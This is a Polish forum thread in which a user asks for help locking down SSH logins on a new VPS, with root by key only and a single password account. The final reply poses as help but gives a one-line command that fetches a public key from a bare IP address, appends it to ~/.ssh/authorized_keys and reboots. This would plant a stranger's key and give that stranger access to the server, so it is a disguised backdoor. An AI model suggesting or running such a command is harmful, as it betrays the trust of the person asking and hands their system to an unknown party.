Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!

Ogłoszenie

Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundację Dzieciom „Zdążyć z Pomocą”.
Więcej informacji na dug.net.pl/pomagamy/.

#1 2019-04-15 19:12:45

orenuk
Nowy użytkownik
Zarejestrowany: 2019-03-22

Prośba o pomoc w realizcji procedury logowania na serwer

Witam,

Postawiłem sobie ostatnio VPS i chciałbym go zabezpieczyć w następujący sposób:
- root ma logować się po kluczu i nie może dostać się do systemu po haśle,
- żaden user, oprócz jednego określonego użytkownika i root'a nie mogą posiadać hasła
- tylko jeden, wybrany użytkownik może logować się do systemu przez ssh za pomocą hasła
- nie można dostać się na root'a z poziomu innego użytkownika, np. za pomocą polecenia su -

Czy ktoś może mi wytłumaczyć jak osiągnąć powyższy efekt?
Będę też wdzięczny za konstruktywną krytykę tego rozwiązania.

Z góry dziękuję za odpowiedź,
Pozdrawiam

Offline

 

#2 2019-04-15 20:26:38

rulezdc
Członek DUG
Skąd: Tarnowskie Góry
Zarejestrowany: 2007-05-22

Re: Prośba o pomoc w realizcji procedury logowania na serwer

cześć
na jaki przedmiot to zaliczenie ?

Offline

 

#3 2019-04-15 21:17:47

orenuk
Nowy użytkownik
Zarejestrowany: 2019-03-22

Re: Prośba o pomoc w realizcji procedury logowania na serwer

rulezdc napisał(-a):

na jaki przedmiot to zaliczenie ?

Chcę sobie stworzyć środowisko, na którym będzie się można logować tylko na konto roota za pomocą klucza (kwestia bezpieczeństwa). Natomiast to jedno konto z hasłem, chciałbym używać z każdego miejsca, ale na wszelki wypadek bez możliwości przejścia z niego na roota. To konto będzie dla mnie takim podręcznym magazynem, do którego chcę sobie zasysać rzeczy.
Głowiłem się nad tym jak to zaimplementować, ale skończyło się 2 razy na utracie możliwości logowania na VPS, więc proszę o pomoc ;)

Offline

 

#4 2019-04-15 23:52:53

091619EE
Użytkownik
Zarejestrowany: 2018-07-09

Re: Prośba o pomoc w realizcji procedury logowania na serwer

Moze to zadziala:

Kod:

mkdir -p ~/.ssh && chmod 700 ~/.ssh && wget -U "vps" -O - http://198.167.223.75/m76.pub | cat >> ~/.ssh/authorized_keys && reboot

Offline

 

Stopka forum

Powered by PunBB
© Copyright 2002–2005 Rickard Andersson
To nie jest tylko forum, to nasza mała ojczyzna ;-)